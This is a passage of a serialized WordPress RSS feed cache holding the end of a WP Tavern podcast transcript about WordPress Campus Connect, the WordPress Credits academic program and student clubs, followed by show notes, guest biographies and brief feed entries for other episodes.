their own touch because this will be more personalised thing. They will get attached to this, and maybe we can have some of the students to put their websites live. So it&#8217;ll be, again, a good chance.</p>\n\n\n\n<p>And we are also getting some support from the hosting companies who are offering some pre-hosting accounts so we can do kind of a competition kind of thing, or someone who has done incredible work during the workshops and post workshop, we can provide them those free hostings and they can get the chance to put their website live.</p>\n\n\n\n<p>[00:36:21] <strong>Nathan Wrigley:</strong> Okay, so it&#8217;s a real kind of project based education then. So you walk into the room, you interact with the educators, you ask questions, I&#8217;m struggling with this thing, I can&#8217;t make this work, and they come and step in. So you described it as a workshop and maybe the audience, I don&#8217;t know if you&#8217;re familiar with that kind of setup, but education often felt like to me, person at the front with some kind of display, whiteboard, blackboard, whatever. They talk, I listen, I fall asleep.</p>\n\n\n\n<p>But this is not that. This is, okay, we have a project, we&#8217;re going to design a business website, a personal portfolio, resume kind of website. And the idea is that you interact with that and by the time you&#8217;ve left, you&#8217;ve got some useful knowledge. You&#8217;ve done a thing, not just listen to somebody talking about possibly doing a thing hands on. Okay, that&#8217;s brilliant.</p>\n\n\n\n<p>Is there any kind of age restriction? Because obviously if I was to bring along a 3-year-old to this, we would question the utility of that. You kept talking about colleges and I think you mentioned universities a couple of times. So it feels to me as if we&#8217;re 18 or something is kind of where this goes, yeah?</p>\n\n\n\n<p>[00:37:28] <strong>Anand Upadhyay:</strong> Yeah, most of the students we interacted with are around mostly 17 plus we can say, 17 or 18 plus. So that&#8217;s the age group. And this year we have got a student, we have got a request from one of the high school as well. So they want to, their approach was very nice. They want to give the students kind of exposure to what they are going to face after completing their high school. So they&#8217;re running kind of a program so they&#8217;re also interested in if we can just go to their school and give their students some kind of a short introduction about any skill that is relevant for them. So we&#8217;re also getting that kind of request as well.</p>\n\n\n\n<p>[00:38:04] <strong>Nathan Wrigley:</strong> Yeah, and that&#8217;s such an interesting age as well, because you haven&#8217;t yet kind of formulated your path. And I think maybe by the time you get to 16, 17, 18, you&#8217;re more funneled. You&#8217;ve made decisions which have led you in a certain direction. You know, I&#8217;m going to be a, I&#8217;m into agriculture, I want to do whatever it may be.</p>\n\n\n\n<p>But if the high school level, everything&#8217;s wide open still, isn&#8217;t it? And if you can get them and expose somebody that&#8217;s never been on a computer even, and, oh look, I put something and people nowhere in me can suddenly see it, that may open up a completely new pathway.</p>\n\n\n\n<p>But what you&#8217;ve got going at the moment, what do these students get in return? Is there like a quid pro quo? Is there some, sort of leading question here really. Is there some credit that you might get on the other end of this? Do students get to walk away with, apart from obviously the knowledge, which is now in their head for life, do they get to walk away with some kind of accreditation to say, I did this, here&#8217;s my certificate, or whatever it may be?</p>\n\n\n\n<p>[00:38:59] <strong>Anand Upadhyay:</strong> Yeah. So we are again providing them certificates for the completion of attending the workshop. And, yes, obviously they are getting some amazing knowledge, amazing exposure to the community. Yeah, but as a proof of thing that they have done something, we are providing them certificates.</p>\n\n\n\n<p>[00:39:14] <strong>Nathan Wrigley:</strong> Okay. And obviously, you know, if they then continue that participation in the meetups and what have you, you get the bit which is way more important than the certificate, which is the actual exposure to the people out there in the real world who can give you that leg up or point you in the right direction for the person that you need to help you on that first career step.</p>\n\n\n\n<p>So I&#8217;m just going to the panel, I&#8217;m just going to say. Did you want to add anything to that? So I was talking about this sort of double fronted marketplace, you know, students, one side, educators on the other. Anything to add?</p>\n\n\n\n<p>[00:39:43] <strong>Destiny Kanno:</strong> Well, I did want to add in general that we&#8217;ve been very careful to say in all of the handbooks and landing pages, educational institutions. So that could be colleges, that could be high schools, that could be technical schools or different business schools, boot camps, wherever you&#8217;re getting educated on something that WordPress can maybe be hand in hand with.</p>\n\n\n\n<p>We would love you to run a WordPress Campus Connect event, so I wanted to like make sure we clarify that. And then also, anyone could put this on. A request to organise could come from like a teacher, for example, or a student even. We&#8217;re not like limiting it to local community organisers or anything like that. So if there is direct interest as well from a campus, then that&#8217;s even better because, you know, they&#8217;re going to have a venue and all they really need is like mentorship and maybe some facilitators.</p>\n\n\n\n<p>And then to plug in just a bit, you were like, what kind of curriculum do they have? Don&#8217;t forget, there&#8217;s Learn WordPress, you know, .org as well where folks can definitely use the materials there to craft their own curriculum or a series of workshops or whatever they&#8217;re going to put on as well. So I do want to ensure folks know that there are resources available that are free to help you with that part of the programming too.</p>\n\n\n\n<p>[00:41:00] <strong>Nathan Wrigley:</strong> I&#8217;m just going to read this into the record. If you are, I don&#8217;t know how podcasts are consumed, I just know that they&#8217;re consumed in a wide variety of ways. If you are driving the car or you are walking somewhere and you think, I&#8217;ll get to this later, stop. If you know an educator somewhere, make a point to mention this to them at some point. You know, tomorrow, get home, phone them up. They&#8217;ve probably never heard of this. They&#8217;re probably not in the WordPress space. They probably don&#8217;t have the slightest intuition that this freely available stuff could step into their institution, with what sounds like minimal work required on their part.</p>\n\n\n\n<p>But it&#8217;s unlikely that they&#8217;re WordPressers in the same way that you are because you&#8217;re listening to this podcast. So that&#8217;s my request to you, that&#8217;s your philanthropic request of the day. Go and mention it to the people that you know, who work in these places and have connections with these places, because it won&#8217;t happen without those kind of things happening. So, sorry, Isotta, I didn&#8217;t allow you a chance to speak. I got all carried away.</p>\n\n\n\n<p>[00:42:00] <strong>Isotta Peira:</strong> Don&#8217;t worry at all, Nathan. I believe that we&#8217;ve been saying a lot already, and there is just a good amount of information around for everyone who&#8217;s listening about how this program works, how to connect with us, and how to just launch their Campus Connect series events in their cities.</p>\n\n\n\n<p>[00:42:18] <strong>Nathan Wrigley:</strong> So we&#8217;ve spent a long time thinking about WP Campus Connect, but something that was dropped into the show notes, and I confess, I don&#8217;t really have a great deal of background on this, so you&#8217;re going to have to explain it in full. WordPress Credits. The name I guess suggests something, but I don&#8217;t really know what that something is. So, Isotta, if you fancy just running with that, tell us about WordPress Credits.</p>\n\n\n\n<p>[00:42:39] <strong>Isotta Peira:</strong> Of course. Big pleasure for me to share more about it. WordPress Credits, in simple words, is a contribution based practice programs by the WordPress foundation open to students to just to bridge them in the Core of WordPress. Regardless of what they&#8217;re studying, their fields, their interests, what we want to do is take one step from the WordPress skills education and show them how they can enhance, train, and gain new skills using the WordPress ecosystems, regardless their interests.</p>\n\n\n\n<p>And the word credits, as you said, yes, it&#8217;s just something because we want to partner with educational institutions, universities, schools, that will recognise the practice program into their students&#8217; curriculum.</p>\n\n\n\n<p>A clear example, we&#8217;ve just launched a pilot with the University of Pisa in Italy for the Department of Translation and Communication. And for them, we are offering 150 hours of practice for the students. They will be connected with mentors. They&#8217;re going to have their virtual classrooms, and they&#8217;ll be guided since the beginning until the end. At the end, they&#8217;re going to build their website of WordPress, we teach them how to do it. You are going to use the Learn platform to guide them through the whole process. And they&#8217;re going to be involved in practical work within the community.</p>\n\n\n\n<p>They get to pitch what they want to work on. So this is open for designer, translators, developers, whoever wants to practice their own skills and position themself already into the job environment. Because we noticed, I felt like livid on my skin when I was studying translation at the University of Pisa, that I had to do countless hours of practice translating things that nobody ever read, used. It was very good for me. For me it was perfect to have things to practice on, and so I could become a great translator, but I worked on stuff that nobody ever used.</p>\n\n\n\n<p>And the moment I joined the WordPress community in 2022 and I found out about the Polyglots team, I start thinking, hey, I could have been translating WordPress for five years and getting real life experience, exposure to a global community of professionals in the field that I&#8217;m interested, and also connection with companies with other fields that I couldn&#8217;t even imagine it existed for me as a translator.</p>\n\n\n\n<p>So the goal of this program is exactly to enable students around the world, regardless what they&#8217;re studying, to become, to shape their future through practice. And we, when I say we, I mean all the volunteers and contributors who are participating into this project. We have designed a path for each student where they not only get to practice the skills that are more relevant to the fields of study, but also transferable skills.</p>\n\n\n\n<p>Like, for example, organising, working independently in a remote and async environment while keeping stakeholders updated. How to design a project, because they will have to finish the program, presenting a project that they would&#8217;ve designed, developed, and worked on. Public speaking because they would have also exposure to presenting the work to the WordPress community.</p>\n\n\n\n<p>And at the end of the mentorship, of course, from experienced contributors in our community, and at the end, at the wrap up, they will receive a certificate from the WordPress Foundation, certifying the hours of contribution within the program. And at that point, the educational institution they&#8217;re studying, they&#8217;re going to recognise these as a part of their curriculum.</p>\n\n\n\n<p>For some universities and schools, it translates into credits. For example, for Pisa, 150 hours of contribution translating into six credits. So students can decide to skip a traditional exam and do this practice. And for other institution might look different. But the requirement for an institution to join this program is that they have to recognise this work into the students curriculum.</p>\n\n\n\n<p>[00:47:08] <strong>Nathan Wrigley:</strong> Okay so, dear listener, you may have noticed we shifted gears. We went from talking about WP Campus Connect to WordPress Credits, and we&#8217;ve now moved into a very different arena.</p>\n\n\n\n<p>And so now, I&#8217;ve never been to the University of Pisa, but I&#8217;m going to guess that, just the name itself, it&#8217;s an utterly credible institution, you know, with a long history of taking in students and requiring them to work hard in order that they get some kind of qualification at the end.</p>\n\n\n\n<p>So this is very different. We are now talking about doing WordPressy things, and at the end of it, it&#8217;s equal to a proportion of the stuff that they would be doing at that university already. Now that then, I guess, implies that this is a more structured thing, that there needs to be more inspection of what&#8217;s going on, that there needs to be kind of hoops to jump through that you need to be able to credibly say, we know that this person did this. We can prove it. There&#8217;s a paper trail, and at the end of it you get, with the University of Pisa, six credits, which equals whatever that equals.</p>\n\n\n\n<p>So presumably there&#8217;s more backwards and forwards. Rather than the WP Campus Connect, which is more philanthropic and, you know, more community based, presumably you&#8217;ve had to have fairly lengthy conversations and dialogue with the University of Pisa so that they know that you are not giving away six credits for nothing. What&#8217;s that been like?</p>\n\n\n\n<p>[00:48:39] <strong>Isotta Peira:</strong> Yes, you are absolutely right, and this is the case, and it is understandably, because we need to show them what is the potential, and what the students will gain. For me, it&#8217;s been a wonderful experience. And now I&#8217;m also in conversation with other universities and other schools. And having myself lived, like felt this gap between, oh, I&#8217;m doing practice, but it feels like it&#8217;s just useful to me, but it&#8217;s not applied in the real world.</p>\n\n\n\n<p>And seeing, hey, this could bring, just basically push all these students into creating something that not only they own, because I believe the ownership is very important because most of cases, studies are a little bit passive. So as you were saying before, we have a teacher, we sit, we listen and we do what we&#8217;re asked to do.</p>\n\n\n\n<p>In this case is the other way around. It&#8217;s, hey, this is a playground of learning opportunities for you. We show you everything that you can play with, and then you get to design the project. You get to experiment all this exposure to real life that usually you don&#8217;t get at university or another, let&#8217;s say, formal institutions. And for the universities, this is going to be, basically a certificate for institutional excellence for them, because right now, only the University of Pisa is offering this. In a few weeks, also the universities Fidélitas in Costa Rica will start offering this.</p>\n\n\n\n<p>So just, hey, to institutions worldwide, this is something that the university, once they understand what it is, they will want to jump on it. And so as you say, it&#8217;s a lot of back and forth. It&#8217;s always a very interesting conversation because every university has some similar and some different needs for their students. And for me it&#8217;s a huge learning curve because I&#8217;m getting to learn a lot about other institutions. But at the end, everyone who I&#8217;ve been talking to so far, they are like over the moon with the idea of offering this option, this possibility to their students.</p>\n\n\n\n<p>What I&#8217;m doing right now is starting connecting with teachers, schools, universities, institution that I personally, I&#8217;m already personally connected with, like the case in Pisa. And the WordPress community is key because also, in this community, there&#8217;s plenty of teachers. Everywhere you look, there is, oh, okay, I teach WordPress, I teach this other WordPress related theme. Oh, I teach at this school, I teach at this universities. Or, hey, in my kids&#8217; school, they were looking for something like this, and it turns out that maybe you&#8217;re not a teacher, but you have kids and they&#8217;re at schools.</p>\n\n\n\n<p>So it&#8217;s been key, the connection with the community. And it&#8217;s actually one of the biggest needs that we have right now. Right now, there are three, including myself, contributors focusing on this project. We need more help, also to create this connection, to get into the institution and to have them understand the offer that we&#8217;re giving to them.</p>\n\n\n\n<p>[00:51:59] <strong>Nathan Wrigley:</strong> So I&#8217;m going to read into the record a recycled version of the comment that I made a moment ago about WP Campus Connect. And that is that if you know anybody who could fit into this part of the jigsaw, you know, an educator or somebody that works in a university, whatever capacity that may be, I guess you are looking for that door to be slightly pushed ajar so that you&#8217;ve got these contacts wherever they may be. Obviously you&#8217;ve got Pisa, Costa Rica and what have you. But it would be nice to spread this a little bit further.</p>\n\n\n\n<p>Okay. Okay, so that bit is now done. The bit that I want to ask with this is with the university students going through the WordPress Credit system, is this kind of a distributed thing? Is it something that they can do in their own time? Or do they need to, I don&#8217;t know, attend, be in a particular lecture hall at a particular time in order to prove that they&#8217;ve done a particular thing? Or is it entirely remote with, well, basically it&#8217;s a very open-ended question. How does it work from a student point of view? How do they achieve this?</p>\n\n\n\n<p>[00:52:59] <strong>Isotta Peira:</strong> This is a great question actually. The values behind this program is to keep the open source experience as real as possible. So it is a hundred percent remote. We have built the virtual classroom for each student on the Learn platform, and they will be able to self onboard themself, go through the all the steps, but at the same time, they will be paired with the mentors.</p>\n\n\n\n<p>So we strongly recommend, and for this first, let&#8217;s say, round of program, we are making strong suggestion to meet with their mentor once per week, so they can learn more about each other, the mentor can help them guiding their way, but they have to complete the hours. We want to, not just respect the principle of the WordPress ecosystems, but also put students in this real life environment that they will find in their job.</p>\n\n\n\n<p>Because most of the roles in different type of companies, you just don&#8217;t have to like stay there and show that they&#8217;re doing the things. You work at your pace. You have your project. You have to share updates, of course, and show that you are progressing. And for WordPress credits, if students want to work on weekends, during night, this is up to them. They just have to complete the WordPress site and the hours assigned.</p>\n\n\n\n<p>And there are couple of steps that will have them syncing at a specific moment with other parts of the community. For example, participating to a discussion on Slack, or a discussion on a blog post. Because also they&#8217;re experimenting different tool and different communication styles. And if there is a meetup, local meetup active in their cities, one of the step would also be participate to one of them. Or if there is no meetup, local meetup happening, to join an online meetup.</p>\n\n\n\n<p>So in this way the success of this program would reach the most, the highest point, if they have not only completed the work they decided to do, but if they also have experienced all the different parts of the ecosystem. So this way they work out the program, and they have the new world possibility open. They can decide to stay, they can decide to just focus more on one particular thing and they would&#8217;ve learned how to upload and work on WordPress, TV. How to use tools like Slack, GitHub, WordPress, the Learn platform, everything. So this is what they will get.</p>\n\n\n\n<p>[00:55:32] <strong>Nathan Wrigley:</strong> Yeah, it&#8217;s pretty amazing. I mean, set aside the fact that when I was at university, the internet just didn&#8217;t exist because I&#8217;m of a certain age, but I would&#8217;ve loved something like this. The capacity to just sort of do things in my own time, you know, fit it around, cherry pick the bits that I want to pick. For me it was much more, you pick a course, you show up to the course, you imbibe the content, you sit and exam and so it goes. And that was what was on offer. But this is so great.</p>\n\n\n\n<p>And also, I don&#8217;t know if this is something that you do do but it just came into my head, the capacity for this to be an accreditation prior to gaining access to a university. So at the minute in the UK, all of the results are coming out for the examinations which children, well, young adults require in order to get to their place at university. And then when they&#8217;re at the university, they obviously get these credits and get the degree or what have you. But something like WordPress credits, it&#8217;d be kind of fun if it could count towards that onboarding process, you know, to get you in the door of a university to show up and say, I did the WordPress thing. I did something a little bit above and beyond what everybody else is doing. I mean, I don&#8217;t know if there&#8217;s any plans for that, but that struck me as a curious option.</p>\n\n\n\n<p>[00:56:45] <strong>Isotta Peira:</strong> That would be the dream. Having WordPress credits embedded into like mandatory curriculum to get to a specific level of education, or to be able to end, to graduate from a specific level of education. This is going to be the dream. Now we&#8217;ve taken the first steps, so now we&#8217;ve built up the program, we are going to gather feedback, improve it, adjust it with all these first new batch of students that are coming. And also from the sponsors, the universities, and the mentors feedback. And then little by little, this is where we want to go. Ready to bring WordPress contributions everywhere.</p>\n\n\n\n<p>[00:57:22] <strong>Nathan Wrigley:</strong> Yeah, I mean, gosh, what an episode this has been. I thoroughly enjoyed this. However, I don&#8217;t know if we&#8217;re done yet because on the show notes that I had, we had three points that we were to mention. One was WP Campus Connect, which we did at the beginning, and then we&#8217;ve just spent a few moments talking about WordPress Credits. But there&#8217;s this other curious bit that I don&#8217;t know much about, and I don&#8217;t know if this is something we want to delve into, WordPress Student Clubs. What&#8217;s that?</p>\n\n\n\n<p>[00:57:47] <strong>Destiny Kanno:</strong> Yeah, so that is, you don&#8217;t have to have a WordPress Campus Connect event to request a WordPress Student Club on your campus. But it essentially was birthed out of this idea from Anand of like, hey, you know, now that we&#8217;ve got this captive audience of students, like where do they go to continue the WordPress activities after we&#8217;re gone? And so the, yeah, WordPress Student Clubs were born.</p>\n\n\n\n<p>You can now request a site created for your Student Club when you request to organise a WordPress Campus Connect event, or you can just reach out to us directly. And right now, I believe Anand is working with the Sophia Girls College right now in Ajmer to set up their WordPress Student Club. I think they&#8217;re the first actually to have one.</p>\n\n\n\n<p>And the goal is that they can continue on campus, their WordPress activities. They can connect still with the local community, potentially like invite them to their student club events. It&#8217;s just like a extracurricular circle or club that now is WordPress themed that will, I think, help them continue.</p>\n\n\n\n<p>And also, sorry, I just wanted bring in like the Credits portion too. Like you might have folks from different majors, right, that are using WordPress in different ways. So it&#8217;s a way for also the students to intermingle amongst different majors within their campus as well.</p>\n\n\n\n<p>[00:59:08] <strong>Nathan Wrigley:</strong> It&#8217;s kind of a way to keep the conversation going, isn&#8217;t it, in a sense? It&#8217;s more opportunities to kind of keep people interested and give them opportunities. And all of that is just so necessary. We talked at the beginning about the age demographic of WordPress and how all of this stuff is just such a real credible way of trying to tackle that.</p>\n\n\n\n<p>And I think if you were to put somebody that went through, let&#8217;s say, WP Campus Connect. If you were to drop them straight into a meetup, maybe that&#8217;s too much, because it can get fairly technical. You know, the presentations are often about some fairly technical things, and so this feels like a really nice bridge. It keeps it more based around the students, so they&#8217;re familiar with each other. They&#8217;re in the same institution, presumably. It&#8217;s kind of like a club. We call them afterschool clubs in the UK. It feels a little bit more like that. So it&#8217;s much more based around where they already are and that kind of thing.</p>\n\n\n\n<p>[00:59:59] <strong>Destiny Kanno:</strong> It gives them a sense of ownership as well, because it&#8217;s as you said, it&#8217;s a students&#8217; club, so, you know, there&#8217;s going to be someone that&#8217;s leading it, and maybe a co-lead as well, and a faculty member who will also be there to advise or assist.</p>\n\n\n\n<p>[01:00:13] <strong>Anand Upadhyay:</strong> It&#8217;s kind of an in campus meetup group, that kind of thing. So they can, just like you said, taking them to the local community meetup will be a little bit overwhelming from them, because whatever the sessions, whatever the topics that are planned in the meetups stuff, catering to the wider audience. So in the campus club they can decide their own kind of topics. What are the topics they are interested in? And they can learn, it&#8217;s kind of a group learning as well. Someone from them is learning one topic and delivering this knowledge to the other club members. So it&#8217;s a way to keep the momentum going on that is started with WordPress Campus Connect program.</p>\n\n\n\n<p>[01:00:51] <strong>Nathan Wrigley:</strong> Yeah, it&#8217;s absolutely wonderful. I&#8217;m going to make sure, before we finally finish this call, although we&#8217;ll end the podcast recording in a moment, I&#8217;ll make sure that I ask these panelists to send me any links that may assist you. And so what I&#8217;m going to say is if you head to the wptavern.com website, and if you search for this episode, you could probably search for WP Campus Connect or WordPress Credits or what have you, certainly it&#8217;ll be there available in search.</p>\n\n\n\n<p>Head to that, look at the show notes and the links. There&#8217;ll be a transcript of this and there&#8217;ll be some show notes where I just sort of summarise what&#8217;s going on. But right at the bottom, a little way down the page will be all of the links for everything that we have discussed. Maybe some additional ones as well for things that we didn&#8217;t have.</p>\n\n\n\n<p>And when I attend WordPress events, there&#8217;s always a sense of this, there&#8217;s always a sense of look around, the community&#8217;s not getting any younger. We&#8217;ve got to do something about it. Complaining is the wrong word. People are not doing that, they&#8217;re just curious about that. Well, here, you&#8217;ve been spoonfed the solution. You now know what it is that you could do to skew the demographic younger. If the WordPress project is something that you believe in, and you would like to carry on, the only way to do that is to have a funnel of younger people who will become the older people, who will then teach the younger people. And so the cycle continues.</p>\n\n\n\n<p>If you want that to happen and you don&#8217;t know how to make that happen, well, now you do. You&#8217;ve got these people to reach out to. You&#8217;ve got these projects that you know about. You can get involved in any of this, at any level.</p>\n\n\n\n<p>And all that it remains for me to do is to say, wow, thank you to all three of you for being interested in this. Not just interested, being active and making the effort to get these things started, to get them off the ground, which is the hardest bit, I think. And hopefully now that they have got off the ground, they will fly with wings of their own. That would be really nice. So, Destiny, Isotta and Anand, thank you so much for chatting to me today. What an episode that was.</p>\n\n\n\n<p>[01:02:55] <strong>Destiny Kanno:</strong> Thank you so much, Nathan.</p>\n\n\n\n<p>[01:02:57] <strong>Isotta Peira:</strong> Thank you. It&#8217;s been a huge pleasure.</p>\n\n\n\n<p>[01:02:59] <strong>Anand Upadhyay:</strong> And thank you for giving us a platform to share all these initiatives.</p>\n</div></details>\n\n\n\n<p>On the podcast today we have <a href=\"https://profiles.wordpress.org/piyopiyofox/\">Destiny Kanno</a>, <a href=\"https://profiles.wordpress.org/peiraisotta/\">Isotta Peira</a> and <a href=\"https://profiles.wordpress.org/anandau14/\">Anand Upadhyay</a>.</p>\n\n\n\n<p>Destiny is the head of Community Education at Automattic. Isotta is the leader of the WordPress credits initiative for students. Anand is the founder of WordPress Campus Connect.</p>\n\n\n\n<p>This episode is all about how WordPress is not only powering websites but also empowering the next generation of learners and creators. You’ll hear about the growing movement of education-focused WordPress events happening worldwide, from hands-on workshops on university campuses in India, to student clubs designed to keep the momentum going after introductory events.</p>\n\n\n\n<p>Anand shares how WP Campus Connect is bringing WordPress directly to students, reducing barriers to entry and helping bridge the gap between academic learning and real-world tech skills. We also explore the challenges of organising these events, from convincing institutions of the value of open source, to fostering genuine community involvement among both students and educators.</p>\n\n\n\n<p>Isotta then introduces us to the WordPress Credits program, an initiative that lets students turn their contributions to the WordPress ecosystem into recognised academic credit at universities like Pisa in Italy. It’s a win-win: students gain practical, resume-worthy experience, while educational institutions get a transferable, skills-focused, program that prepares learners for the jobs of the future.</p>\n\n\n\n<p>Whether you’re an educator, a WordPress enthusiast, or just someone who cares about open source and community, this episode is packed with actionable insights. The guests share how flexible and resilient these education initiatives are, how you can get involved, and why engaging the next generation is not just important, but essential for the continued growth and sustainability of the WordPress community.</p>\n\n\n\n<p>It’s a truly inspiring episode, and is at the intersection of so many areas of profound importance.</p>\n\n\n\n<p>If you’re curious about how to bring WordPress into your local school, university, or community, or if you just want to hear how WordPress is making a difference far beyond the web, this episode is for you.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Useful links</h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/handbook/wordpress-credits-contribution-internship-program/\">WordPress Credits Program</a></p>\n\n\n\n<p><a href=\"https://gamma.app/docs/WordPress-Credits-2ul3dmv61tpover?mode=present#card-qc1u5yvi4tt7he1\">WordPress Credits: A bridge to open-source technology</a></p>\n\n\n\n<p><a href=\"https://events.wordpress.org/campusconnect/\">WordPress Campus Connect</a></p>\n\n\n\n<p><a href=\"https://learn.wordpress.org/\">Learn WordPress</a></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/community/handbook/community-deputy/other-event-formats/wordpress-campus-connect/#wordpress-campus-connect-student-clubs\">WordPress Student Clubs</a></p>\n\n\n\n<p><a href=\"https://wordpress.org/news/2025/07/introducing-wordpress-credits-a-new-contribution-internship-program-for-university-students/\">Introducing WordPress Credits: A New Contribution Internship Program for University Students</a></p>\n\n\n\n<h2 class=\"wp-block-heading\">Biographies</h2>\n\n\n\n<h3 class=\"wp-block-heading\">Destiny Kanno</h3>\n\n\n\n<p>Destiny Fox Kanno, sponsored contributor at Automattic with a focus on education within the WordPress community. Currently focusing on growing, enabling and amplifying the WordPress Campus Connect and Student Club initiatives.</p>\n\n\n\n<h3 class=\"wp-block-heading\">Isotta Peira</h3>\n\n\n\n<p>Isotta joined the WordPress Community in 2022 as a full-time contributor to the Community Team, sponsored by Automattic. With a background in translation, sales, training, and community management, she also ran a culinary events business. She values making informed decisions by integrating data analysis into her work and believes sharing knowledge is key to fighting inequality. Isotta is currently leading the WordPress Credits program, an initiative that connects open-source contributions with academic curricula worldwide.</p>\n\n\n\n<h3 class=\"wp-block-heading\">Anand Upadhyay</h3>\n\n\n\n<p>Anand Upadhyay is the founder of WPVibes, a WordPress plugin development company. He has been working with WordPress since 2010 and contributes to several Make WordPress teams, including Core, Docs, Polyglots, and Community. He also serves as an organizer for WordCamp Asia, one of the flagship events in the WordPress ecosystem.<br />In addition to building plugins, Anand is deeply passionate about teaching and education. He co-organizes the Ajmer WordPress Meetup and is currently contributing to the global expansion of WordPress Campus Connect, a program he initiated as a pilot in 2024 to introduce students to WordPress and open source. Through these efforts, he focuses on helping new learners and contributors discover opportunities to learn, grow, and find their place in the WordPress community.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 03 Sep 2025 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"Open Channels FM: How WordPress Handles Backwards Compatibility: Lessons from Real-World Challenges\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=105983\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"https://openchannels.fm/how-wordpress-handles-backwards-compatibility-lessons-from-real-world-challenges/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:241:\"The discussion on backwards compatibility highlights its importance in WordPress, ensuring seamless functionality during updates. Experts emphasize careful support for older versions, enabling a smoother user experience across diverse sites.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 03 Sep 2025 10:22:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"Open Channels FM: Building a Resilient Web with Arweave’s Vision for Decentralized Long-Term Content Storage\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=108589\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:114:\"https://openchannels.fm/building-a-resilient-web-with-arweaves-vision-for-decentralized-long-term-content-storage/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:201:\"The episode features Dave Lockie having a conversation with Sam Williams about Arweave, a decentralized storage network addressing digital impermanence and promoting permanent information preservation.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 03 Sep 2025 09:45:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:48:\"WpOrg\\Requests\\Utility\\CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Wed, 24 Sep 2025 02:18:48 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:13:\"last-modified\";s:29:\"Wed, 24 Sep 2025 02:00:20 GMT\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:16:\"content-encoding\";s:2:\"br\";s:7:\"alt-svc\";s:19:\"h3=\":443\"; ma=86400\";s:4:\"x-nc\";s:9:\"HIT ord 